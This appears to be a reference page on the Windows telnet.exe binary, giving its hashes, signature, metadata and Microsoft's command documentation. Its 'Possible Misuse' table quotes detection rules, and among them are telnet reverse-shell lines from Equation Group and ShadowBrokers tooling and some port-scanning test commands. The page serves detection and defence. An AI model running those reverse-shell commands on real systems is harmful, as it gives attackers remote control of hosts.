telnet.exe
- File Path: C:\Windows\system32\telnet.exe
- Description: Microsoft Telnet Client
Hashes
Type | Hash |
---|---|
MD5 | 8EAE1ADEF9BF1A17B152F31C79088A88 |
SHA1 | FE037BB6B345A866586A96D8E7A6EF6A23B4EF4D |
SHA256 | ABE72A168C332E2FCB493E85290744E7153ECD109A0B5FFD7FABBAAC339C673A |
SHA384 | 49A1D098853F737A530C026903CB8093BD72793C2EA13A73671892D488F13BBADD9C534BDE44B3AB8689AC59194CB232 |
SHA512 | 4165E51FB605D3CD5671B0C4AD282A9645B2AE2193D923819C6BE45AE9427AD628488CE5877A69CEAE5ADA4505201B23C30202EE15CBF0FDD8E0CC72E5D95B8F |
SSDEEP | 3072:fR4CNuFPMRjUJdxKPggRqYx7XoQEYvkWEnqq:J4CM1MRQJdxKPggRqW76sAnq |
Signature
- Status: Signature verified.
- Serial: 33000001C422B2F79B793DACB20000000001C4
- Thumbprint: AE9C1AE54763822EEC42474983D8B635116C8452
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: telnetc.exe.mui
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.17763.1 (WinBuild.160101.0800)
- Product Version: 10.0.17763.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
Possible Misuse
The following table contains possible examples of telnet.exe being misused. While telnet.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | lnx_auditd_network_service_scanning.yml | - '/telnet' | DRL 1.0 |
sigma | lnx_apt_equationgroup_lnx.yml | - '/bin/telnet locip locport < /dev/console \| /bin/sh' | DRL 1.0 |
sigma | lnx_apt_equationgroup_lnx.yml | - '&& telnet * 2>&1 </dev/console' | DRL 1.0 |
sigma | lnx_shell_susp_rev_shells.yml | - ' \| /bin/bash \| telnet ' | DRL 1.0 |
sigma | proc_creation_macos_network_service_scanning.yml | - '/telnet' | DRL 1.0 |
sigma | proc_creation_lnx_network_service_scanning.yml | - '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection. consider fine tuning | DRL 1.0 |
sigma | image_load_uac_bypass_via_dism.yml | - Actions of a legitimate telnet client | DRL 1.0 |
sigma | proc_creation_win_multiple_suspicious_cli.yml | - telnet.exe | DRL 1.0 |
sigma | proc_creation_win_susp_plink_remote_forward.yml | Description: 'Command-line SSH, Telnet, and Rlogin client' | DRL 1.0 |
malware-ioc | LinuxMooseETrules.txt | alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Possible Linux/Moose Telnet CnC Beacon"; flow:established,to_server; dsize:40; content:"\|0e 00 00 00\|"; offset:4; depth:4; fast_pattern; content:!"\|00\|"; within:1; content:!"\|00\|"; distance:3; within:1; content:"\|00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\|"; distance:4; within:28; content:!"\|00 00 00 00\|"; depth:4; reference:url,welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf; classtype:trojan-activity; sid:2021149; rev:1;) | © ESET 2014-2018 |
malware-ioc | moose | leveraging weak or default usernames and passwords via the Telnet protocol. If | © ESET 2014-2018 |
atomic-red-team | T1046.md | Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout. | MIT License. © 2018 Red Canary |
atomic-red-team | T1046.md | telnet #{host} #{port} | MIT License. © 2018 Red Canary |
atomic-red-team | T1046.md | ##### Description: Check if telnet command exists on the machine | MIT License. © 2018 Red Canary |
atomic-red-team | T1046.md | if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi; | MIT License. © 2018 Red Canary |
atomic-red-team | T1046.md | (which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet) | MIT License. © 2018 Red Canary |
atomic-red-team | T1110.001.md | * Telnet (23/TCP) | MIT License. © 2018 Red Canary |
atomic-red-team | T1110.003.md | * Telnet (23/TCP) | MIT License. © 2018 Red Canary |
atomic-red-team | T1110.004.md | * Telnet (23/TCP) | MIT License. © 2018 Red Canary |
atomic-red-team | T1571.md | Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon execution, details about the successful | MIT License. © 2018 Red Canary |
atomic-red-team | T1571.md | Testing uncommonly used port utilizing telnet. | MIT License. © 2018 Red Canary |
atomic-red-team | T1571.md | telnet #{domain} #{port} | MIT License. © 2018 Red Canary |
signature-base | apt_eqgrp.yar | $x5 = "-p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | description = "EQGRP Toolset Firewall - from files ssh.py, telnet.py" | CC BY-NC 4.0 |
signature-base | apt_eqgrp_apr17.yar | $s2 = "Cut and paste the following to the telnet prompt:" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp_apr17.yar | description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh" | CC BY-NC 4.0 |
signature-base | apt_eqgrp_apr17.yar | $x2 = "Remote Usage: /bin/telnet locip locport < /dev/console \| /bin/sh"" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_fvey_shadowbroker_dec16.yar | $s5 = "bll.telnet" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_fvey_shadowbroker_dec16.yar | $s1 = "/sbin/sh -c (mkdir /tmp/.X11R6; cd /tmp/.X11R6 && telnet" ascii | CC BY-NC 4.0 |
signature-base | generic_anomalies.yar | $s1 = "SSH, Telnet and Rlogin client" fullword wide | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME" | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | $s0 = "TELNET [host [port]]" fullword wide | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | $s2 = "TELNET.EXE" fullword wide | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | $s14 = "Software\Microsoft\Telnet" fullword wide | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | description = "Detects malicious telnet shell" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | description = "Semi-Auto-generated - file telnet.pl.txt" | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | description = "Semi-Auto-generated - file telnet.cgi.txt" | CC BY-NC 4.0 |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
telnet
Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012
Communicates with a computer running the telnet server service. Running this command without any parameters lets you enter the telnet context, as indicated by the telnet prompt (Microsoft telnet>). From the telnet prompt, you can use telnet commands to manage the computer running the telnet client.
Important: You must install the telnet client software before you can run this command. For more information, see Installing telnet.
Syntax
telnet [/a] [/e <escapechar>] [/f <filename>] [/l <username>] [/t {vt100 | vt52 | ansi | vtnt}] [<host> [<port>]] [/?]
Parameters
Parameter | Description |
---|---|
/a | Attempts automatic logon. Same as /l option, except that it uses the currently logged on user's name. |
/e <escapechar> | Specifies the escape character used to enter the telnet client prompt. |
/f <filename> | Specifies the file name used for client side logging. |
/l <username> | Specifies the user name to log on with on the remote computer. |
/t {vt100 \| vt52 \| ansi \| vtnt} | Specifies the terminal type. Supported terminal types are vt100, vt52, ansi, and vtnt. |
<host> [<port>] | Specifies the hostname or IP address of the remote computer to connect to, and optionally the TCP port to use (default is TCP port 23). |
/? | Displays help at the command prompt. |
Examples
To use telnet to connect to the computer running the telnet Server Service at telnet.microsoft.com, type:
telnet telnet.microsoft.com
To use telnet to connect to the computer running the telnet Server Service at telnet.microsoft.com on TCP port 44 and to log the session activity in a local file called telnetlog.txt, type:
telnet /f telnetlog.txt telnet.microsoft.com 44
MIT License. Copyright (c) 2020-2021 Strontic.